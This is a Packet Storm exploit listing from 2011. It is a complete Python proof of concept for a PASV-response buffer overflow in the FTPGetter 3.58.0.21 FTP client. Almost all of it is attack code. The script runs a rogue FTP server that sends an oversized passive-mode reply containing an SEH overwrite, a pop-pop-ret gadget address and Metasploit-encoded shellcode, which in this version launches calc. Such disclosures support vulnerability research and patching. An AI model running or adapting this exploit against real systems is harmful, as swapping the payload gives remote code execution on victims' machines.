FTPGetter 3.58.0.21 Buffer Overflow

2011-02-03T00:00:00
ID PACKETSTORM:98111
Type packetstorm
Reporter modpr0be
Modified 2011-02-03T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit  
# Date: 02/03/2011  
# Author: modpr0be  
# Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe  
# Vulnerable version: <= 3.58.0.21  
# Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285)  
# CVE : N/A  
  
# ======================================================================  
# ___ _ __ __ __ _ __  
# ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _  
# / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/  
# / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ /  
# \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/  
# /____/ http://www.digital-echidna.org  
# ======================================================================  
#  
# Greetz:  
# say hello to all digital-echidna org crew:  
# otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix  
# special thx:  
# otoy, cipherstring, cyb3r.anbu, oebaj.  
# help for documentation:   
# offsec, exploit-db, corelan-team, 5M7X, loneferret.  
#  
  
#### Software description:  
# Save time on FTP/SFTP updates! Plan your uploads and automate the workflow.  
# Schedule and automate file transfers with a centralized console. Let your  
# computer move or synchronize information securely between home and office  
# automatically according to the schedule!  
#  
#### Exploit information:  
# There was an error when sending a response to the PASV command.  
# Fortunately, these errors lead to buffer overflows.  
# This exploit is unstable. It should only be used as a POC.  
# I tried several times on various systems,   
# the buffer sometimes changed.  
#  
### Some Conditions:  
# This POC is using "the most selling feature" Automated FTP Request.  
# So this POC, I use Auto Download with / as the Source Files.  
# Scheduler Settings also set to Repetitive.  
# Make sure to run the program first before this POC.  
#  
#### Other information:  
# It's a part of "Death of an FTP Client" :)  
# For more information, loot at here:  
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/  
#  
##  
  
from socket import *  
import struct  
import time  
  
total = 1000  
junk1 = "\x41" * 485  
nseh = "\xeb\x06\x90\x90"  
seh = struct.pack('<L', 0x1001A149) # ppr from ssleay32.dll  
nops = "\x90" * 8  
  
# msfpayload windows/exec CMD=calc R | msfencode -t c  
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)  
# BadChars \x00\xff\x0d\x5c\x2f\x0a  
  
shellcode = (  
"\xdb\xd1\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x32\xb8\xca\xea\xc0"  
"\x1f\x31\x42\x17\x83\xc2\x04\x03\x88\xf9\x22\xea\xf0\x16\x2b"  
"\x15\x08\xe7\x4c\x9f\xed\xd6\x5e\xfb\x66\x4a\x6f\x8f\x2a\x67"  
"\x04\xdd\xde\xfc\x68\xca\xd1\xb5\xc7\x2c\xdc\x46\xe6\xf0\xb2"  
"\x85\x68\x8d\xc8\xd9\x4a\xac\x03\x2c\x8a\xe9\x79\xdf\xde\xa2"  
"\xf6\x72\xcf\xc7\x4a\x4f\xee\x07\xc1\xef\x88\x22\x15\x9b\x22"  
"\x2c\x45\x34\x38\x66\x7d\x3e\x66\x57\x7c\x93\x74\xab\x37\x98"  
"\x4f\x5f\xc6\x48\x9e\xa0\xf9\xb4\x4d\x9f\x36\x39\x8f\xe7\xf0"  
"\xa2\xfa\x13\x03\x5e\xfd\xe7\x7e\x84\x88\xf5\xd8\x4f\x2a\xde"  
"\xd9\x9c\xad\x95\xd5\x69\xb9\xf2\xf9\x6c\x6e\x89\x05\xe4\x91"  
"\x5e\x8c\xbe\xb5\x7a\xd5\x65\xd7\xdb\xb3\xc8\xe8\x3c\x1b\xb4"  
"\x4c\x36\x89\xa1\xf7\x15\xc7\x34\x75\x20\xae\x37\x85\x2b\x80"  
"\x5f\xb4\xa0\x4f\x27\x49\x63\x34\xd7\x03\x2e\x1c\x70\xca\xba"  
"\x1d\x1d\xed\x10\x61\x18\x6e\x91\x19\xdf\x6e\xd0\x1c\x9b\x28"  
"\x08\x6c\xb4\xdc\x2e\xc3\xb5\xf4\x4c\x82\x25\x94\x92")  
  
junk2 = "\x90" * (total - len(junk1+nseh+seh+nops+shellcode))  
payload = junk1+nseh+seh+nops+shellcode+junk2  
  
host = "0.0.0.0"  
port = 21  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind((host, port))  
s.listen(1)  
  
print "\n[+] FTPGetter v3.58.0.21 Buffer Overflow POC"  
print "[+] by modpr0be[at]digital-echidna[dot]org."  
print "============================================="  
print "[+] Evil FTP Server Started."  
print "[+] Listening on %d ..." % port  
  
cl, addr = s.accept()  
print "[+] Connection accepted from %s" % addr[0]  
print "[+] Whatever for username and password."  
  
def hajar():  
welcome = "220 Welcome to EvilFTP Server\r\n"  
cl.send(welcome)  
cl.recv(1024)  
cl.send("331 User name okay, need password\r\n") # received USER  
cl.recv(1024)  
cl.send("230-Password accepted\r\n") # received PASS  
cl.send("230 User logged in.\r\n")  
cl.recv(1024)  
cl.send("215 UNIX Type: L8\r\n") # received from SYST  
cl.recv(1024)  
cl.send("200 Type set to I\r\n") # received from TYPE I  
cl.recv(1024)  
cl.send("200 OK\r\n") # received from REST 0  
cl.recv(1024)  
cl.send("200 Command not Understood\r\n") # received from OPTS UTF8 OFF  
cl.recv(1024)  
cl.send("257 \"/\" is current directory\r\n") # received from PWD  
cl.recv(1024)  
cl.send("250 CWD Command successful.\r\n")  
cl.recv(1024)  
cl.send("257 \"/\" is current directory\r\n") # received from PWD  
cl.recv(1024)  
cl.send("200 Type set to I\r\n") # received from TYPE I  
cl.recv(1024)  
print "[+] Begin sending evil passive mode.."  
cl.send("227 Entering Passive Mode ("+payload+",1,1,1,1,1)\r\n") # this is the junk from passive mode  
cl.recv(1024)  
cl.close()  
  
hajar()  
time.sleep(3)  
print "[+] Skadush! Calculator will pop out..\r\n"  
  
s.close()  
  
  
`